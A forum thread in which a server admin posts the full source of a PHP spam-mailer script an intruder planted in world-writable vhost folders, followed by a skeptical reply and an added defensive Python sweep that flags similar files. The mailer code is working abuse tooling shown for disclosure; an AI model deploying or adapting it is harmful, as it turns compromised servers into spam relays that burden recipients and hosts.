Spam zombie script found after hacker attack

Postfix, QMail, Sendmail, Dovecot, Cyrus, Courier, Anti-Spam
thefreeman
Posts: 84
Joined: 2003-04-24 18:58
Location: Bayern

Post by thefreeman » 2006-10-26 10:50

Hello.

Today I found out what kind of script the hacker dropped.
Under my vhosts, in various folders with 777 permissions, the following PHP file had been placed (mail.php):

<?

If ($action=="mysql"){
	#Grab email addresses from MySQL
	include "./mysql.info.php";
	if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
	print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
	exit;
	}
	$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
	mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
	$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
	$numrows = mysql_num_rows($result);
	
	for($x=0; $x<$numrows; $x++){
	$result_row = mysql_fetch_row($result);
	$oneemail = $result_row[0];
	$emaillist .= $oneemail."n";
	}
	}

if ($action=="send"){
	$message = urlencode($message);
	$message = ereg_replace("%5C%22", "%22", $message);
	$message = urldecode($message);
	$message = stripslashes($message);
	$subject = stripslashes($subject);
}

?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr> 
      <td width="10%"> 
        <div align="right"><font size="-1" face="Tahoma">Your 
          Email:</font></div>
      </td>
      <td width="18%"><font size="-1" face="Tahoma"> 
        <input type="text" name="from" value="<? print $from; ?>" size="30">
        </font></td>
      <td width="31%"> 
        <div align="right"><font size="-1" face="Tahoma">Your 
          Name:</font></div>
      </td>
      <td width="41%"><font size="-1" face="Tahoma"> 
        <input type="text" name="realname" value="<? print $realname; ?>" size="30">
        </font></td>
    </tr>
    <tr> 
      <td width="10%"> 
        <div align="right"><font size="-1" face="Tahoma">Reply-To:</font></div>
      </td>
      <td width="18%"><font size="-1" face="Tahoma"> 
        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
        </font></td>
      <td width="31%"> 
        <div align="right"><font size="-1" face="Tahoma">Attach 
          File:</font></div>
      </td>
      <td width="41%"><font size="-1" face="Tahoma"> 
        <input type="file" name="file" size="30">
        </font></td>
    </tr>
    <tr> 
      <td width="10%"> 
        <div align="right"><font size="-1" face="Tahoma">Subject:</font></div>
      </td>
      <td colspan="3"><font size="-1" face="Tahoma"> 
        <input type="text" name="subject" value="<? print $subject; ?>" size="90">
        </font></td>
    </tr>
    <tr valign="top"> 
      <td colspan="3"><font size="-1" face="Tahoma"> 
        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
        <br>
        <input type="radio" name="contenttype" value="plain" checked>
        Plain 
        <input type="radio" name="contenttype" value="html">
        HTML 
        <input type="hidden" name="action" value="send">
        <input type="submit" value="Send Message">
        </font></td>
      <td width="41%"><font size="-1" face="Tahoma"> 
        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
        <br>
        
    </tr>
  </table>
</form>

<?
if ($action=="send"){

	if (!$from && !$subject && !$message && !$emaillist){
	print "Please complete all fields before sending your message.";
	exit;
	}
	
	$allemails = split("n", $emaillist);
	$numemails = count($allemails);

	#Open the file attachment if any, and base64_encode it for email transport
	If ($file_name){
		@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
		$content = fread(fopen($file,"r"),filesize($file));
		$content = chunk_split(base64_encode($content));
		$uid = strtoupper(md5(uniqid(time())));
		$name = basename($file);
	}
	
	for($x=0; $x<$numemails; $x++){
		$to = $allemails[$x];
		if ($to){
		$to = ereg_replace(" ", "", $to);
		$message = ereg_replace("&email&", $to, $message);
		$subject = ereg_replace("&email&", $to, $subject);
		print "Sending mail to $to.......";
		flush();
		$header = "From: $realname <$from>rnReply-To: $replytorn";
		$header .= "MIME-Version: 1.0rn";
		If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uidrn";
		If ($file_name) $header .= "--$uidrn";
		$header .= "Content-Type: text/$contenttypern";
		$header .= "Content-Transfer-Encoding: 8bitrnrn";
		$header .= "$messagern";
		If ($file_name) $header .= "--$uidrn";
		If ($file_name) $header .= "Content-Type: $file_type; name="$file_name"rn";
		If ($file_name) $header .= "Content-Transfer-Encoding: base64rn";
		If ($file_name) $header .= "Content-Disposition: attachment; filename="$file_name"rnrn";
		If ($file_name) $header .= "$contentrn";
		If ($file_name) $header .= "--$uid--";
		mail($to, $subject, "", $header);
		flush();
		}
		}

}

?>

I have removed the script and closed my security holes.
Now the filthy spam has stopped again.

rootsvr
Posts: 538
Joined: 2005-09-02 11:12

Re: Spam zombie script found after hacker attack

Post by rootsvr » 2006-10-26 13:43

And what is your post for?

- You wanted to tell us that you were a spambot?
--> Super.. Great.. Bravo!

- You wanted to show us a spam script?
--> They are a dime a dozen everywhere?

- You want to brag about having closed the (unnamed) security holes?
--> Are you sure? How do you know that the attacker only uploaded this script?

- You are bored?
--> Me too!

edit: fixed typo
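
Added example, not part of either post: a defensive sweep that follows up on the question of whether mail.php was the only file dropped. It lists every PHP file sitting in a world-writable directory, plus files elsewhere that share several traits of the posted script; the indicator patterns, the suffix list and the demo tree are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Heuristic traits taken from the mail.php quoted in the thread (not signatures).
INDICATORS = {
    "mail_call": re.compile(rb"\bmail\s*\("),
    "recipient_list": re.compile(rb"\$emaillist\b"),
    "per_recipient_placeholder": re.compile(rb"&email&"),
}

def indicators_in(path, max_bytes=1 << 20):
    with open(path, "rb") as fh:
        data = fh.read(max_bytes)
    return sorted(n for n, rx in INDICATORS.items() if rx.search(data))

def sweep(root, min_hits=2):
    """Yield (relative path, directory is world-writable, indicator names)."""
    for dirpath, _dirs, files in os.walk(root):
        ww = bool(os.stat(dirpath).st_mode & stat.S_IWOTH)  # e.g. mode 777
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            full = os.path.join(dirpath, name)
            try:
                hits = indicators_in(full)
            except OSError:
                continue  # unreadable or vanished file, skip it
            # Any PHP in a 777 dir needs review; elsewhere require several traits.
            if ww or len(hits) >= min_hits:
                yield os.path.relpath(full, root), ww, hits

def build_demo_tree():
    root = tempfile.mkdtemp(prefix="vhosts-")
    samples = {  # constructed sample contents, not real sites
        "site1/uploads/mail.php": (0o777, b'<? split("n", $emaillist); mail($to, $subject, "", $header); ?>'),
        "site1/htdocs/contact.php": (0o755, b"<?php mail($admin, $s, $body); ?>"),
        "site2/cache/t.php": (0o777, b"<?php echo 1; ?>"),
    }
    for rel, (mode, body) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        os.chmod(os.path.dirname(path), mode)  # explicit: mkdir honours umask
        with open(path, "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    print(*sorted(sweep(build_demo_tree())), sep="\n")
```

The patterns are heuristics, so an empty result does not show that nothing else was planted.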